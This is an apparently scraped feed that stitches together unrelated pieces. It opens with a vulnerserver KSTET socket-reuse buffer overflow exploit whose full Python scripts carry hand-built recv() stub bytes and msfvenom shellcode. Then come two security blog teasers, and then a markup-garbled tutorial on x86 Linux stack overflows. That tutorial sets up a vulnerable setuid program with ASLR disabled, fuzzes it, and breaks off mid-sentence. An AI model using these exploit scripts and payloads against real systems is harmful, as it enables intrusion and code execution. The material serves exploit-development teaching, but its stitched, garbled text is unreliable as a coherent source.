recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)

---

Exploitation

All we have to do is generate a second payload and send it right after our overflow payload. Since we have tricked vulnserver into running the recv() function, it will take our second send data and store it at the buffer address we specified. Let’s test this out with a payload of 0xCC (Int 3) so that the program will halt when it hits our shellcode.

Let’s add some basic shellcode to pop calc.exe and verify that our exploit works.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

# WS2_32.recv() Stack Setup
recv = ""
recv += "\x83\xEC\x50"                  # SUB ESP, 50
recv += "\x33\xD2"                      # XOR EDX, EDX
recv += "\x52"                          # PUSH EDX (FLAGS = 0)
recv += "\x83\xC2\x04"                  # ADD EDX, 0x4 
recv += "\xC1\xE2\x08"                  # SHL EDX, 8
recv += "\x52"                          # PUSH EDX (BUFFER SIZE = 0x400)
recv += "\x33\xD2"                      # XOR EDX, EDX 
recv += "\xBA\x90\xF8\xF9\xB8"          # MOV EDX, 0xB8F9FB90
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 
recv += "\x52"                          # PUSH EDX (BUFFER LOCATION = 0x00B8F9FB)
recv += "\xB9\x90\x94\xFB\xB8"          # MOV ECX, 0xB8FB9490
recv += "\xC1\xE9\x08"                  # SHR ECX, 8 
recv += "\xFF\x31"                      # PUSH DWORD PTR DS:[ECX] (SOCKET DESCRIPTOR LOADED)
recv += "\xBA\x90\x2C\x25\x40"          # MOV EDX, 0X0040252C
recv += "\xC1\xEA\x08"                  # SHR EDX, 8 (Location of RECV())
recv += "\xFF\xD2"                      # CALL EDX

buf = ""
buf += "KSTET /.:/"
buf += "\x90" * 2                       # NOPS
buf += recv                             # WS2_32.recv() function call
buf += "\x90" * (66 - (len(recv) + 2))  # NOPS 
buf += JMP_ESP                          # JMP ESP
buf += "\xEB\xB8"                       # JMP SHORT
buf += "C" * 500                        # FILLER
buf += "\r\n"

s.send(buf)                             # Stage 1 Payload Send

# msfvenom -p windows/exec CMD=calc.exe -b '\x00' --var-name calc -f python
calc =  b""
calc += b"\xdb\xdc\xd9\x74\x24\xf4\x5f\xb8\x43\x2c\x57\x7b\x2b"
calc += b"\xc9\xb1\x31\x31\x47\x18\x83\xc7\x04\x03\x47\x57\xce"
calc += b"\xa2\x87\xbf\x8c\x4d\x78\x3f\xf1\xc4\x9d\x0e\x31\xb2"
calc += b"\xd6\x20\x81\xb0\xbb\xcc\x6a\x94\x2f\x47\x1e\x31\x5f"
calc += b"\xe0\x95\x67\x6e\xf1\x86\x54\xf1\x71\xd5\x88\xd1\x48"
calc += b"\x16\xdd\x10\x8d\x4b\x2c\x40\x46\x07\x83\x75\xe3\x5d"
calc += b"\x18\xfd\xbf\x70\x18\xe2\x77\x72\x09\xb5\x0c\x2d\x89"
calc += b"\x37\xc1\x45\x80\x2f\x06\x63\x5a\xdb\xfc\x1f\x5d\x0d"
calc += b"\xcd\xe0\xf2\x70\xe2\x12\x0a\xb4\xc4\xcc\x79\xcc\x37"
calc += b"\x70\x7a\x0b\x4a\xae\x0f\x88\xec\x25\xb7\x74\x0d\xe9"
calc += b"\x2e\xfe\x01\x46\x24\x58\x05\x59\xe9\xd2\x31\xd2\x0c"
calc += b"\x35\xb0\xa0\x2a\x91\x99\x73\x52\x80\x47\xd5\x6b\xd2"
calc += b"\x28\x8a\xc9\x98\xc4\xdf\x63\xc3\x82\x1e\xf1\x79\xe0"
calc += b"\x21\x09\x82\x54\x4a\x38\x09\x3b\x0d\xc5\xd8\x78\xe1"
calc += b"\x8f\x41\x28\x6a\x56\x10\x69\xf7\x69\xce\xad\x0e\xea"
calc += b"\xfb\x4d\xf5\xf2\x89\x48\xb1\xb4\x62\x20\xaa\x50\x85"
calc += b"\x97\xcb\x70\xe6\x76\x58\x18\xc7\x1d\xd8\xbb\x17"


payload = ""
payload += calc
payload += "\r\n"

s.send(payload)                           # Stage 2 Payload Send

Vulnserver KSTET Socket Re-use
Joshua

TL; DR: this blog post serves as an advisory for both: CVE-2020-28054: An Authorization Bypass vulnerability affecting JamoDat – TSMManager Collector v. <= 6.5.0.21 A Stack Based Buffer Overflow affecting IBM Tivoli Storage Manager – ITSM Administrator Client Command Line Administrative Interface (dsmadmc.exe) Version 5, Release 2, Level 0.1. Unfortunately, after I had one of […]

The post Tivoli Madness appeared first on VoidSec.

Last week SentinelOne disclosed a “high severity” flaw in HP, Samsung, and Xerox printer’s drivers (CVE-2021-3438); the blog post highlighted a vulnerable strncpy operation with a user-controllable size parameter but it did not explain the reverse engineering nor the exploitation phase of the issue. With this blog post, I would like to analyse the vulnerability […]

The post Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438 appeared first on VoidSec.

pThis is the start of a series of tutorials exploring how to detect and exploit a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a based vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflow/a on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations./p pA buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (a href="https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation" target="_blank"heap/a). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners./p pAll of the code in this tutorial was written by the author./p !--more-- h2The Vulnerable App/h2 pBelow is the source code of the vulnerable application that we will be attacking. It is written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThe code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (codestrncpy(p, a, strlen(a)+1);/code). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer codep/code as codestrlen(a)+1/code, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to codestrncpy(p, a, sizeof(p)-1);/code or codestrncpy(p, a, 511);/code, we minus the 1 byte to leave space for the terminating null character 'code\0/code'. For more information about strncpy see a href="http://linux.die.net/man/3/strncpy" target="_blank"man strncpy/a./p h2Setting Up The Environment/h2 pThis is how to setup the environment in full on a a href="https://www.debian.org/" target="_blank"Debian/a based system:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser testuser/span span class="code-line"span class="go"Adding user `testuser#39; .../span/span span class="code-line"span class="go"Adding new group `testuser#39; (1001) .../span/span span class="code-line"span class="go"Adding new user `testuser#39; (1001) with group `testuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/testuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app app.c/span span class="code-line"span class="gp"root@dev:~# /spancp app /home/testuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space /span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"cd/span /home/testuser//span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod u+s app/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spansu - testuser/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l secret.txt /span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49./p h2Testing The App / Finding The Vulnerability/h2 pFirst we need to use the application to figure out its inputs and see how the application acts normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"testuser@dev:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pAs we can see, when we enter the wrong password the applications exit code is code1/code, let's try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"os/span/span span class="code-line"span class="kn"from/span span class="nn"subprocess/span span class="kn"import/span span class="n"Popen/spanspan class="p",/span span class="n"PIPE/span/span span class="code-line"/span span class="code-line"span class="n"count/spanspan class="o"=/spanspan class="mi"0/span span class="c1"# store the number when we cause a crash/span/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"5000/spanspan class="p"):/span span class="c1"# loop through the numbers from 0 to 5000/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# execute the file ./app with the argument quot;Aquot;*i so we keep/span/span span class="code-line" span class="c1"# increasing the number of A#39;s by 1/span/span span class="code-line" span class="n"process/span span class="o"=/span span class="n"Popen/spanspan class="p"([/spanspan class="s2"quot;./appquot;/spanspan class="p",/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p"],/span span class="n"stdin/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p",/span span class="n"stdout/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p")/span/span span class="code-line" span class="p"(/spanspan class="n"output/spanspan class="p",/span span class="n"err/spanspan class="p")/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"communicate/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="n"exit_code/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"wait/spanspan class="p"()/span span class="c1"# wait for the programs exit code/span/span span class="code-line" span class="k"if/span span class="n"exit_code/span span class="o"!=/span span class="mi"1/spanspan class="p":/span span class="c1"# if its not = 1/span/span span class="code-line" span class="n"count/span span class="o"=/span span class="n"i/span span class="c1"# set the count to i/span/span span class="code-line" span class="k"break/span span class="c1"# and break out of the loop/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="nb"print/span span class="n"count/span span class="c1"# print the number of A#39;s it took to crash it/span/span span class="code-line"/code/pre/div /td/tr/table pRunning the python script gives us:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-fuzz.py/span span class="code-line"span class="go"524/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo the python script crashed the application by inserting 524 A's as its input. Just because we crashed the application it doesn't mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes)./p pWe will use codegdb/code to do this. The hex for codeA/code is code41/code, you can figure this out using the ascii man page (a href="http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7" target="_blank"man ascii/a), so what we are looking for is when the application crashes it should be trying to run code41414141/code (as this is a 32 bit system, each instruction is 32 bits long or 4 bytes):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xbffff970 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pWe increase the number of bytes by 